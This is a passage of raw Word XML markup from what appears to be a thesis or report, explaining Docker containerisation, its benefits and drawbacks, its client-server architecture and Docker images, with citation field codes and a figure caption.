              <w:noProof/>
            </w:rPr>
            <w:t>[13]</w:t>
          </w:r>
          <w:r w:rsidR="002A6F05">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F82977">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037AC50F" w14:textId="4A653D7A" w:rsidR="00B669F0" w:rsidRDefault="0099358C" w:rsidP="00D92488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc86859250"/>
      <w:r>
        <w:t>DOCKER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="23E00A19" w14:textId="121FDE10" w:rsidR="00B933F3" w:rsidRDefault="008F4114" w:rsidP="00BF55AB">
      <w:r>
        <w:t xml:space="preserve">Docker is a public containerisation </w:t>
      </w:r>
      <w:r w:rsidR="00EA68B3">
        <w:t>platform developed based on Linux features that allow deploy</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00EA68B3">
        <w:t>, creat</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00EA68B3">
        <w:t>, and run</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t>ning</w:t>
      </w:r>
      <w:r w:rsidR="00EA68B3">
        <w:t xml:space="preserve"> applic</w:t>
      </w:r>
      <w:r w:rsidR="004F5D97">
        <w:t>ations.</w:t>
      </w:r>
      <w:r w:rsidR="002B5017">
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r w:rsidR="007A5657">
        <w:t>enables to containerise and run application dependencies in a</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>n entirely</w:t>
      </w:r>
      <w:r w:rsidR="007A5657">
        <w:t xml:space="preserve"> secluded atmosphere </w:t>
      </w:r>
      <w:r w:rsidR="006B3C8D">
        <w:t xml:space="preserve">known as </w:t>
      </w:r>
      <w:r w:rsidR="00471080">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="006B3C8D">
        <w:t>container.</w:t>
      </w:r>
      <w:r w:rsidR="00D72DC4">
        <w:t xml:space="preserve"> It uses Linux features, such as namespaces and Cgroups to provide isolation and security, supporting </w:t>
      </w:r>
      <w:r w:rsidR="00BF55AB">
        <w:t>multiple</w:t>
      </w:r>
      <w:r w:rsidR="00D72DC4">
        <w:t xml:space="preserve"> containers to run simultaneously on a single host.</w:t>
      </w:r>
      <w:r w:rsidR="00BF55AB">
        <w:t xml:space="preserve"> Simply put, it is an extension of LXC technology with more advanced features and capabilities</w:t>
      </w:r>
      <w:r w:rsidR="004A58E8">
        <w:t xml:space="preserve">. For instance, Docker uses improved API </w:t>
      </w:r>
      <w:r w:rsidR="00E7438C">
        <w:t>to produce enhanced virtualisation outcome</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>s,</w:t>
      </w:r>
      <w:r w:rsidR="00701359">
        <w:t xml:space="preserve"> enabling each application to run isolated </w:t>
      </w:r>
      <w:r w:rsidR="005E2773">
        <w:t>on top of the host’s OS.</w:t>
      </w:r>
      <w:r w:rsidR="00D17A38">
        <w:t xml:space="preserve"> Further, Docker containers are </w:t>
      </w:r>
      <w:r w:rsidR="001D6F19">
        <w:t xml:space="preserve">small in size and </w:t>
      </w:r>
      <w:r w:rsidR="00D17A38">
        <w:t xml:space="preserve">contain </w:t>
      </w:r>
      <w:r w:rsidR="001D6F19">
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidR="00D17A38">
        <w:t xml:space="preserve"> the necessary </w:t>
      </w:r>
      <w:r w:rsidR="001D6F19">
        <w:t xml:space="preserve">packages to run an application. As a result, </w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="001D6F19">
        <w:t>Docker platform provides portability and simplicity to share containers across the cloud</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1283005181"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="003F2FE0">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="003F2FE0">
            <w:instrText xml:space="preserve"> CITATION BRa17 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00844F04">
            <w:instrText xml:space="preserve"> \m AMP20</w:instrText>
          </w:r>
          <w:r w:rsidR="00757532">
            <w:instrText xml:space="preserve"> \m doc21</w:instrText>
          </w:r>
          <w:r w:rsidR="003F2FE0">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[14, 15, 16]</w:t>
          </w:r>
          <w:r w:rsidR="003F2FE0">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="001D6F19">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BC0F9C" w14:textId="2A6EA87A" w:rsidR="00844F04" w:rsidRDefault="00757532" w:rsidP="00BF55AB">
      <w:r>
        <w:t>Docker has become the de</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>facto platform in the production environment to create and deploy containerised applications because of its many benefits</w:t>
      </w:r>
      <w:r w:rsidR="00D34A08">
        <w:t xml:space="preserve">. One of the main advantages of using Docker is speed. With Docker, it is </w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>super-fast</w:t>
      </w:r>
      <w:r w:rsidR="00D34A08">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00DB4503">
        <w:t>build</w:t>
      </w:r>
      <w:r w:rsidR="00D34A08">
        <w:t xml:space="preserve"> a container because they are lightweight, and thus </w:t>
      </w:r>
      <w:r w:rsidR="00DB4503">
        <w:t>testing, deploying</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00DB4503">
        <w:t xml:space="preserve"> and development processes of an application can be achieved faster. In addition, </w:t>
      </w:r>
      <w:r w:rsidR="00E54366">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="000767F3">
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>’ applications</w:t>
      </w:r>
      <w:r w:rsidR="00E54366">
        <w:t xml:space="preserve"> are highly portable</w:t>
      </w:r>
      <w:r w:rsidR="000767F3">
        <w:t xml:space="preserve"> and easy to manage workloads across </w:t>
      </w:r>
      <w:r w:rsidR="00F45B95">
        <w:t>various environments</w:t>
      </w:r>
      <w:r w:rsidR="000767F3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007E3370">
        <w:t xml:space="preserve"> With Docker, it is also easy to scale up or adjust services according to the business needs, close to real</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007E3370">
        <w:t>time. Further, Docker provides consistent and continuous application integration and delivery workflow</w:t>
      </w:r>
      <w:r w:rsidR="00851D04">
        <w:t xml:space="preserve"> (CI/CD)</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="41410435"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="009C5833">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009C5833">
            <w:instrText xml:space="preserve"> CITATION VTu15 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00706DF2">
            <w:instrText xml:space="preserve"> \m VSh20 \m ONa20</w:instrText>
          </w:r>
          <w:r w:rsidR="009C5833">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[17, 18, 19]</w:t>
          </w:r>
          <w:r w:rsidR="009C5833">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="007E3370">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E32CBF0" w14:textId="7C5FEA47" w:rsidR="00C81801" w:rsidRDefault="00CB1CB6" w:rsidP="00534B95">
      <w:r>
        <w:t>However, Docker has also some drawbacks, particularly with its security and isolation.</w:t>
      </w:r>
      <w:r w:rsidR="005455AC">
        <w:t xml:space="preserve"> Further, Docker does not </w:t>
      </w:r>
      <w:r w:rsidR="00746FBC">
        <w:t>provide compatibility and flexibility with older</w:t>
      </w:r>
      <w:r w:rsidR="005455AC">
        <w:t xml:space="preserve"> machines</w:t>
      </w:r>
      <w:r w:rsidR="00746FBC">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="005455AC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00746FBC">
        <w:t>such as</w:t>
      </w:r>
      <w:r w:rsidR="005455AC">
        <w:t xml:space="preserve"> 32-bit OS</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00746FBC">
        <w:t xml:space="preserve"> as it is designed </w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t>only</w:t>
      </w:r>
      <w:r w:rsidR="00291F9A">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00746FBC">
        <w:t>support 64-bit and new machines</w:t>
      </w:r>
      <w:r w:rsidR="005455AC">
        <w:t>. Also,</w:t>
      </w:r>
      <w:r w:rsidR="00EC7FDC">
        <w:t xml:space="preserve"> with Docker, complete virtualisation cannot be achieved because </w:t>
      </w:r>
      <w:r w:rsidR="00D3053A">
        <w:t xml:space="preserve">Docker relies on </w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00D3053A">
        <w:t>Linux kernel</w:t>
      </w:r>
      <w:r w:rsidR="00746FBC">
        <w:t xml:space="preserve"> of the host machine. In addition, Docker is platform dependent </w:t>
      </w:r>
      <w:r w:rsidR="003F7C7D">
        <w:t>and hence requires more additional layers between the Docker engine and the host OS</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1227375584"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="003F7C7D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="003F7C7D">
            <w:instrText xml:space="preserve"> CITATION Sit21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="009C5833">
            <w:instrText xml:space="preserve"> \m ASH13</w:instrText>
          </w:r>
          <w:r w:rsidR="003F7C7D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[20, 21]</w:t>
          </w:r>
          <w:r w:rsidR="003F7C7D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003F7C7D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B18B3" w14:textId="2D471F92" w:rsidR="00534B95" w:rsidRPr="00534B95" w:rsidRDefault="0099358C" w:rsidP="00D92488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc86859251"/>
      <w:r>
        <w:t>DOCKER ARCHITECTURE AND COMPONENTS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="44645F5F" w14:textId="7498956A" w:rsidR="00844F04" w:rsidRDefault="00174E4B" w:rsidP="00534B95">
      <w:r>
        <w:t xml:space="preserve">The Docker platform </w:t>
      </w:r>
      <w:r w:rsidR="009F1627">
        <w:t>consists of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> various components, including </w:t>
      </w:r>
      <w:r w:rsidR="009F1627">
        <w:t>Docker containers, Docker images, Docker registries, Docker client, and Docker server. The following sections ex</w:t>
      </w:r>
      <w:r w:rsidR="00C21DA0">
        <w:t>plain in detail these components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081FE4B4" w14:textId="5CD083D4" w:rsidR="004A0407" w:rsidRDefault="004A0407" w:rsidP="004A0407">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc86859252"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="00AD273F">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>rchitecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEDAFFD" w14:textId="0F27AA66" w:rsidR="00D61D5E" w:rsidRDefault="00155052" w:rsidP="00D61D5E">
      <w:r>
        <w:t xml:space="preserve">The Docker system operates in a client-server fashion to build and containerise applications. Its architecture contains several elements, </w:t>
      </w:r>
      <w:r w:rsidR="003040D7">
        <w:t>containing Docker client, Docker daemon, and Docker registry.</w:t>
      </w:r>
      <w:r w:rsidR="00425F6D">
        <w:t xml:space="preserve"> The Docker daemon </w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00425F6D">
        <w:t>also known as Docker engine</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00425F6D">
        <w:t xml:space="preserve"> is the cornerstone of the Docker system.</w:t>
      </w:r>
      <w:r w:rsidR="00C92F69">
        <w:t xml:space="preserve"> It is a persistent background process that manages Docker objects, such as Docker images, containers, networks, and volumes</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidR="005E5E5B">
        <w:t xml:space="preserve"> contains three main components: Server, Rest API, and the Command Line Interface (CLI).</w:t>
      </w:r>
      <w:r w:rsidR="00833AC5">
        <w:t xml:space="preserve"> It uses </w:t>
      </w:r>
      <w:r w:rsidR="005E5E5B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00833AC5">
        <w:t xml:space="preserve">REST API to </w:t>
      </w:r>
      <w:r w:rsidR="00F92984">
        <w:t xml:space="preserve">processes </w:t>
      </w:r>
      <w:r w:rsidR="007D0A63">
        <w:t>client request</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007D0A63">
        <w:t xml:space="preserve"> and instruct</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007D0A63">
        <w:t xml:space="preserve"> the Docker daemon, acting as a client-server application.</w:t>
      </w:r>
      <w:r w:rsidR="005E5E5B">
        <w:t xml:space="preserve"> The Docker client enables users to interact and communicate with the Docker engine through API socke</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>ts</w:t>
      </w:r>
      <w:r w:rsidR="005E5E5B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD273F">
        <w:t xml:space="preserve"> The Docker daemon also forwards requests to pull or push images to the Docker registry, a location where Docker images are stored</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-35981741"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="005461B2">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="005461B2">
            <w:instrText xml:space="preserve"> CITATION Sin16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E172EF">
            <w:instrText xml:space="preserve"> \m FŠp15</w:instrText>
          </w:r>
          <w:r w:rsidR="005461B2">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[22, 23]</w:t>
          </w:r>
          <w:r w:rsidR="005461B2">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00AD273F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001D24EA">
        <w:t xml:space="preserve"> Figure 3 illustrates the client-server architecture of Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1694CB" w14:textId="03F65669" w:rsidR="00E172EF" w:rsidRPr="00D61D5E" w:rsidRDefault="00E172EF" w:rsidP="00E172EF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E2A7487" wp14:editId="1716D351">
            <wp:extent cx="5229860" cy="27495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9860" cy="2749550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="788078C9" w14:textId="66C9C9A3" w:rsidR="00844F04" w:rsidRDefault="00E172EF" w:rsidP="00683081">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc86858594"/>
      <w:r w:rsidRPr="00683081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00683081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00683081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00683081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00683081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00683081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Docker architecture</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-963029729"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00683081">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00683081">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION doc211 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00683081">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[24]</w:t>
          </w:r>
          <w:r w:rsidRPr="00683081">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00683081">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="1DEED235" w14:textId="6884731C" w:rsidR="00D269F0" w:rsidRDefault="00D269F0" w:rsidP="00D269F0">
      <w:r>
        <w:t>The client and Docker daemon can be installed on the host machine and communicate using API.</w:t>
      </w:r>
      <w:r w:rsidR="009525FB">
        <w:t xml:space="preserve"> Also, the client can interact with more than one Docker daemon. The Docker system uses various plugins to create and run Docker objects, such as images, containers, volumes, and network</w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009525FB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00712F52">
        <w:t xml:space="preserve"> Further, Docker system enables users to create images locally</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00712F52">
        <w:t xml:space="preserve">publish them to </w:t>
      </w:r>
      <w:r w:rsidR="004120EF">
        <w:t>either public or private repositories</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF5DE1">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004120EF">
        <w:t xml:space="preserve">pull </w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t>them</w:t>
      </w:r>
      <w:r w:rsidR="004120EF">
        <w:t xml:space="preserve"> from the registries to run</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t xml:space="preserve"> and start</w:t>
      </w:r>
      <w:r w:rsidR="004120EF">
        <w:t xml:space="preserve"> containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612E3867" w14:textId="1B417981" w:rsidR="004A4A99" w:rsidRDefault="009525FB" w:rsidP="004A4A99">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc86859253"/>
      <w:r>
        <w:t>Docker Images</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="39DEF7CC" w14:textId="50A9B690" w:rsidR="009D1EB2" w:rsidRDefault="009D1EB2" w:rsidP="009D1EB2">
      <w:r>
        <w:t>In Docker, images are the building blocks</w:t>
      </w:r>
      <w:r w:rsidR="00941255">
        <w:t xml:space="preserve"> or template</w:t>
      </w:r>
      <w:r w:rsidR="00D90E90">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to create containers. It </w:t>
      </w:r>
      <w:r w:rsidR="00941255">
        <w:t>contains a set of instructions to run a container containing all the needed packages</w:t>
      </w:r>
      <w:r w:rsidR="00431A20">
        <w:t xml:space="preserve"> and parameters</w:t>
      </w:r>
      <w:r w:rsidR="00941255">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007C3623">
        <w:t xml:space="preserve"> It is built </w:t>
      </w:r>
      <w:r w:rsidR="007C3623">
        <w:lastRenderedPageBreak/>
        <w:t>with multiple read-only layers</w:t>
      </w:r>
      <w:r w:rsidR="0009318F">
        <w:t>, where each layer is established from its preceding layer</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00315F7C">
        <w:t>thus speed</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00315F7C">
        <w:t xml:space="preserve"> up the Docker build process and increas</w:t>
      </w:r>
      <w:r w:rsidR="0012322C">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00315F7C">
        <w:t xml:space="preserve"> reusability.</w:t>
      </w:r>
      <w:r w:rsidR="008E4865">
        <w:t xml:space="preserve"> As a result</w:t>
      </w:r>
      <w:r w:rsidR="00422452">
        <w:t xml:space="preserve">, Docker is fast, lightweight, and small </w:t>
      </w:r>
      <w:r w:rsidR="00136D3B">
        <w:t>compared to other technologies.</w:t>
      </w:r>
      <w:r w:rsidR="008E4865">
        <w:t xml:space="preserve"> Images </w:t>
      </w:r>
      <w:r w:rsidR="00FF4784">
        <w:t>enable</w:t>
      </w:r>
      <w:r w:rsidR="008E4865">
        <w:t xml:space="preserve"> users to create a container on the writable layer</w:t>
      </w:r>
      <w:r w:rsidR="00431A20">
        <w:t xml:space="preserve"> on top of the read-only layers</w:t>
      </w:r>
      <w:r w:rsidR="00085FF0">
        <w:t>, allowing them</w:t>
      </w:r>
      <w:r w:rsidR="00FF4784">
        <w:t xml:space="preserve"> to make changes without modifying the base image</w:t>
      </w:r>
      <w:r w:rsidR="00431A20">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00085FF0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA2EB1">
        <w:t xml:space="preserve">For this reason, images can be duplicated and shared </w:t>
      </w:r>
      <w:r w:rsidR="00085FF0">
        <w:t>across the Docker repository. Usually, images can be created</w:t>
      </w:r>
      <w:r w:rsidR="00C33938">
        <w:t xml:space="preserve"> manually </w:t>
      </w:r>
      <w:r w:rsidR="00DE48AC">
        <w:t xml:space="preserve">using a simple text editor with a set of </w:t>
      </w:r>
      <w:r w:rsidR="00842C90">
        <w:t xml:space="preserve">series </w:t>
      </w:r>
      <w:r w:rsidR="00DE48AC">
        <w:t xml:space="preserve">commands to run and build an image. </w:t>
      </w:r>
      <w:r w:rsidR="00102BA3">
        <w:t>Alternatively</w:t>
      </w:r>
      <w:r w:rsidR="00DE48AC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00102BA3">
        <w:t>image</w:t>
      </w:r>
      <w:r w:rsidR="00842C90">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00102BA3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00842C90">
        <w:t>can be c</w:t>
      </w:r>
      <w:r w:rsidR="009514FD">
        <w:t>onstructed</w:t>
      </w:r>
      <w:r w:rsidR="00842C90">
        <w:t xml:space="preserve"> based</w:t>
      </w:r>
      <w:r w:rsidR="009514FD">
        <w:t xml:space="preserve"> on other images,</w:t>
